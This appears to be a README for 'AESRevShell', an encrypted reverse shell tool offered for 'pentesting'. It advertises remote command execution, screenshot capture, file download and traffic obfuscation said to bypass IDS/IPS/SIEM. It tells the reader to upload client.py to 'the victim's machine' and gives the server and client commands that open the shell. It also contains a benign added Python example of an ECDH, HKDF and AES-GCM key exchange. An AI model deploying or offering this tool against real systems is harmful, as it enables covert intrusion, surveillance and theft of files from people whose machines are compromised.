AESRevShell is a secure reverse shell tool that utilizes:
- AES-GCM for authenticated encryption
- ECDH (Elliptic Curve Diffie-Hellman) for secure key exchange
- HKDF for key derivation

Ideal for pentesting and security research in monitored environments.

| Feature | Description |
|---|---|
| MITM Protection | ECDH prevents interception |
| Forward Secrecy | Ephemeral session keys |
| Command Execution | Remote command execution with encrypted responses |
| Encrypted Screenshots | Captures and encrypts target screen |
| Traffic Obfuscation | Bypasses IDS/IPS/SIEM |
| Cross-Platform | Works on Linux/Windows/macOS |
| No Key Sharing | Automatic secure exchange |

```mermaid
sequenceDiagram
    participant Server
    participant Client
    Server->>Client: Public Key (ECDH)
    Client->>Server: Public Key (ECDH)
    Note right of Server: Derives shared secret
    Note left of Client: Derives shared secret
    Server->>Client: Encrypted (AES-GCM) Command
    Client->>Server: Encrypted Response
```
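
The exchange in the diagram above, as an added example that is not AESRevShell's own code: both sides generate ephemeral ECDH keys, derive an AES-256-GCM key with HKDF, and the receiver rejects a ciphertext modified in transit. The curve (P-256), the HKDF hash and `info` label, the nonce-prefix framing and all function names are assumptions, not taken from the project.

```python
import os
from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

CURVE = ec.SECP256R1()            # assumed curve; the page does not name one
INFO = b"example session key"     # assumed HKDF context label

def new_keypair():
    """Ephemeral key pair; returns (private key, public key bytes to send)."""
    priv = ec.generate_private_key(CURVE)
    pub = priv.public_key().public_bytes(
        serialization.Encoding.X962, serialization.PublicFormat.UncompressedPoint)
    return priv, pub

def session_key(priv, peer_pub_bytes):
    """ECDH shared secret -> HKDF-SHA256 -> 32-byte AES-256-GCM key."""
    peer = ec.EllipticCurvePublicKey.from_encoded_point(CURVE, peer_pub_bytes)
    shared = priv.exchange(ec.ECDH(), peer)
    return HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=INFO).derive(shared)

def seal(key, plaintext):
    """Encrypt with a fresh random 96-bit nonce, sent in front of the ciphertext."""
    nonce = os.urandom(12)
    return nonce + AESGCM(key).encrypt(nonce, plaintext, None)

def open_sealed(key, blob):
    """Return the plaintext, or None if the blob is too short or the tag fails."""
    if len(blob) < 12 + 16:       # nonce + GCM tag is the minimum valid size
        return None
    try:
        return AESGCM(key).decrypt(blob[:12], blob[12:], None)
    except InvalidTag:
        return None

def demo():
    server_priv, server_pub = new_keypair()   # Server->>Client: Public Key
    client_priv, client_pub = new_keypair()   # Client->>Server: Public Key
    k_server = session_key(server_priv, client_pub)
    k_client = session_key(client_priv, server_pub)
    blob = seal(k_server, b"constructed sample message")
    tampered = blob[:-1] + bytes([blob[-1] ^ 1])   # one bit flipped in transit
    return k_server == k_client, open_sealed(k_client, blob), open_sealed(k_client, tampered)

if __name__ == "__main__":
    print(demo())
```

Ephemeral ECDH on its own does not authenticate the peer; binding the exchanged public keys to an identity (a signature or a pinned key) is a separate step, and the page does not say whether the tool performs one.
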

- Install dependencies:

```bash
sudo apt update && sudo apt install -y python3-pip
python3 -m pip install --upgrade cryptography
```

- Clone the repository:

```bash
git clone https://github.com/OusH4x/AESRevShell
cd AESRevShell
```

- Make the scripts executable:

```bash
chmod +x client.py server.py
```

- Upload `client.py` to the victim's machine.

Start the server (attacker) with the desired IP and port:

```bash
./server.py -i 0.0.0.0 -p 443
```

Connect the client (victim) to the server:

```bash
./client.py -s SERVER_IP -p SERVER_PORT
```

- `screenshot` - Captures target screen
- `download FILE(S)` - Download one or more files
- `exit` - Terminates session
- `CTRL + L` - Clears console

This tool is intended for educational purposes and authorized penetration testing only. Do not use it for malicious purposes. The authors are not responsible for any misuse of this tool.

Contributions are welcome! If you have any suggestions, improvements, or bug fixes, feel free to open an issue or submit a pull request.

